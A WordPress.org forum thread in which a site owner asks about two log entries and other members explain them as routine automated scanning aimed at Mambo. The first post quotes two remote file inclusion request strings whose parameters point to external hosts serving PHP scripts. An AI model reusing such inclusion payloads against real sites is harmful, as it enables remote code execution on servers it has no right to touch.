WordPress.org

Ready to get started?Download WordPress

Forums

HackAttack on my WordPress (4 posts)

  1. jaap
    Member
    Posted 6 years ago #

    Hi All,

    When I was looking at my server logs, I discovered two interesting entries:

    /?config_path=http://www.gumgangfarm.com/shop/data/id.txt

    and

    /index.php?mosConfig_absolute_path=http://89.106.23.150:32000/test.txt

    When I surfed to these URLs, I saw that they contain PHP scripts that try to output information about my server. Do I need to be worried?

    I already looked up some info about the domains, but that probably won't help me, I guess.

    What to do?

  2. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    No. That is an attack directed at systems running Mambo, not WordPress. This giveaway is the mosConfig_absolute_path. Google for that and you'll find that Mambo had a vulnerability there.

    Attackers spam their attacks across large numbers of sites. It's easier and fast for them to do this than to try to determine what sort of site yours is first.

  3. jaap
    Member
    Posted 6 years ago #

    Hi Otto,

    thanks for your quick reply. I recognized the giveaway for mambo in the second request, by "mos". The first request though, I don't know about.

    I don't have any experience with these kind of attacks and I'm not sure how to handle them. Is it normal to receive these kind of 'attacks'?

  4. justinratwebtek
    Member
    Posted 6 years ago #

    You will see all kinds of attacks for various software packages, OS's, etc. At some point, you'll see huge blocks of attacks that are meant for Windows or MSSQL servers - absolutely normal. Keep up with the security updates and make sure you back your site up every once in awhile.

Topic Closed

This topic has been closed to new replies.

About this Topic